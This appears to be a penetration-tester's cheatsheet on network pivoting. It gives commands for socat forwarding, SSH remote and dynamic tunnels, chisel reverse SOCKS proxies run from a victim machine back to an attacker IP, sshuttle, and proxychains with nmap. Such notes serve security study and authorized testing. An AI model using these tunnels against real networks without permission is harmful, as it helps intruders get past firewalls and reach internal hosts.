Pivoting

Port Forwarding

The goal is to redirect packet from one port to another port.

# from ipv4 to ipv6, all packet to localhost:445 will direct to <ipv6>:445
sudo socat TCP-LISTEN:445, fork TCP:<ipv6>:445

ssh to kali machine

port forwarding with ssh

note:

local-port and local-machine in the kali machine (attacker)

ssh -R -N <local-port>:127.0.0.1:<service-port> root@<local-machine>

Reverse Proxy

chisel

ref: https://www.youtube.com/watch?v=dIqoULXmhXg

Releases · jpillora/chiselGitHub

1. Attacker (Kali)

./chisel server -p 8000 --reverse

2. Run in Victim Machine

Windows

chisel.exe client <attacker ip>:8000 R:socks

Linux

./chisel client <attacker ip>:8000 R:sockss

3. Config the proxychains (Attacker)

change /etc/proxychains4.conf

[ProxyList]
socks5 127.0.0.1 1080

4. Run command

proxychains nmap -sT -p 88 -Pn -n <machine 2 ip>

sshuttle

Need (user login as ssh)

# single
sshuttle -r username@remotehost 0.0.0.0/0
# example
sshuttle user@192.168.20.35 192.168.30.0/24

sshuttle -r root@10.1.1.1 10.2.2.0/24

Hacking/OSCP cheatsheetMedium

SSH Tunnel

nice ref:https://www.isabekov.pro/reverse-ssh-tunnel/

Can't ssh to machine?

ssh -p 22 -R "<attacker port>:<host port>

Forward Proxy

chisel

https://notes.benheater.com/books/network-pivoting/page/port-forwarding-with-chisel

sshuttle

Use sshuttle to build a poor man's VPN - Fedora MagazineFedora Magazine

SSH Tunnel (Recommended if you wanna access internal port)

Forward Proxy

Need SSH to machine:

ssh -D <local port> <user>@<IP of victim you have>

#example 
ssh -D 8989 local@10.10.10.10

It mean, every packet to 127.0.0.1:8989 will be forwarded as IP 10.10.10.10

You can set proxy on your browser or proxychains.conf

[Manual Proxy]
socks4 127.0.0.1 8989

Don't forget to using incognito to your browser or clear cache, for better process.

Forward Proxy

If that internal port have vhost configuration, you must set up that /etc/hosts on kali linux with pointing to local port (/etc/hosts on victim machine).

Case of forward proxy

Bypass the Firewall with SSH TunnellingMedium

Are you stuck?

Tunneling and port forwarding tools used during red teaming assessments | Infosec ResourcesInfosec Resources

Network Pentest with Chisel

https://notes.benheater.com/books/network-pivoting/page/penetrating-networks-via-chisel-proxies